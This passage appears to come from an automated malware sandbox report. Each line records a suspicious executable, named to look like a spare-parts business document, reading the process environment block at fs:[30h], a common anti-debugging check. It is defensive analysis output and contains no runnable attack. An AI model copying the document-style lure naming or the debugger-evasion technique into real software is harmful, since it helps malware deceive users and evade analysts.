                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012163C0 mov eax, dword ptr fs:[00000030h]4_2_012163C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C63FF mov eax, dword ptr fs:[00000030h]4_2_011C63FF
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124C3CD mov eax, dword ptr fs:[00000030h]4_2_0124C3CD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]4_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]4_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]4_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012343D4 mov eax, dword ptr fs:[00000030h]4_2_012343D4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012343D4 mov eax, dword ptr fs:[00000030h]4_2_012343D4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov ecx, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118823B mov eax, dword ptr fs:[00000030h]4_2_0118823B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196259 mov eax, dword ptr fs:[00000030h]4_2_01196259
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A250 mov eax, dword ptr fs:[00000030h]4_2_0118A250
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01218243 mov eax, dword ptr fs:[00000030h]4_2_01218243
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01218243 mov ecx, dword ptr fs:[00000030h]4_2_01218243
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118826B mov eax, dword ptr fs:[00000030h]4_2_0118826B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124A250 mov eax, dword ptr fs:[00000030h]4_2_0124A250
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124A250 mov eax, dword ptr fs:[00000030h]4_2_0124A250
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]4_2_01194260
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]4_2_01194260
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]4_2_01194260
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov ecx, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE284 mov eax, dword ptr fs:[00000030h]4_2_011CE284
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE284 mov eax, dword ptr fs:[00000030h]4_2_011CE284
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]4_2_01210283
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]4_2_01210283
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]4_2_01210283
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02A0 mov eax, dword ptr fs:[00000030h]4_2_011A02A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02A0 mov eax, dword ptr fs:[00000030h]4_2_011A02A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]4_2_011A02E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]4_2_011A02E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]4_2_011A02E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226500 mov eax, dword ptr fs:[00000030h]4_2_01226500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198550 mov eax, dword ptr fs:[00000030h]4_2_01198550
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198550 mov eax, dword ptr fs:[00000030h]4_2_01198550
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]4_2_011C656A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]4_2_011C656A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]4_2_011C656A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE59C mov eax, dword ptr fs:[00000030h]4_2_011CE59C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]4_2_012105A7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEB20 mov eax, dword ptr fs:[00000030h]4_2_011BEB20
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01238B42 mov eax, dword ptr fs:[00000030h]4_2_01238B42
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226B40 mov eax, dword ptr fs:[00000030h]4_2_01226B40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226B40 mov eax, dword ptr fs:[00000030h]4_2_01226B40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125AB40 mov eax, dword ptr fs:[00000030h]4_2_0125AB40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118CB7E mov eax, dword ptr fs:[00000030h]4_2_0118CB7E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244B4B mov eax, dword ptr fs:[00000030h]4_2_01244B4B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244B4B mov eax, dword ptr fs:[00000030h]4_2_01244B4B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123EB50 mov eax, dword ptr fs:[00000030h]4_2_0123EB50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244BB0 mov eax, dword ptr fs:[00000030h]4_2_01244BB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244BB0 mov eax, dword ptr fs:[00000030h]4_2_01244BB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0BBE mov eax, dword ptr fs:[00000030h]4_2_011A0BBE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0BBE mov eax, dword ptr fs:[00000030h]4_2_011A0BBE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]4_2_011B0BCB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]4_2_011B0BCB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]4_2_011B0BCB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121CBF0 mov eax, dword ptr fs:[00000030h]4_2_0121CBF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]4_2_01190BCD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]4_2_01190BCD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]4_2_01190BCD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEBFC mov eax, dword ptr fs:[00000030h]4_2_011BEBFC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]4_2_01198BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]4_2_01198BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]4_2_01198BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123EBD0 mov eax, dword ptr fs:[00000030h]4_2_0123EBD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA38 mov eax, dword ptr fs:[00000030h]4_2_011CCA38
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B4A35 mov eax, dword ptr fs:[00000030h]4_2_011B4A35
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B4A35 mov eax, dword ptr fs:[00000030h]4_2_011B4A35
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121CA11 mov eax, dword ptr fs:[00000030h]4_2_0121CA11
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEA2E mov eax, dword ptr fs:[00000030h]4_2_011BEA2E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA24 mov eax, dword ptr fs:[00000030h]4_2_011CCA24
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0A5B mov eax, dword ptr fs:[00000030h]4_2_011A0A5B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0A5B mov eax, dword ptr fs:[00000030h]4_2_011A0A5B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123EA60 mov eax, dword ptr fs:[00000030h]4_2_0123EA60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120CA72 mov eax, dword ptr fs:[00000030h]4_2_0120CA72
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120CA72 mov eax, dword ptr fs:[00000030h]4_2_0120CA72
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]4_2_011CCA6F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]4_2_011CCA6F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]4_2_011CCA6F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C8A90 mov edx, dword ptr fs:[00000030h]4_2_011C8A90
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264A80 mov eax, dword ptr fs:[00000030h]4_2_01264A80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198AA0 mov eax, dword ptr fs:[00000030h]4_2_01198AA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198AA0 mov eax, dword ptr fs:[00000030h]4_2_01198AA0
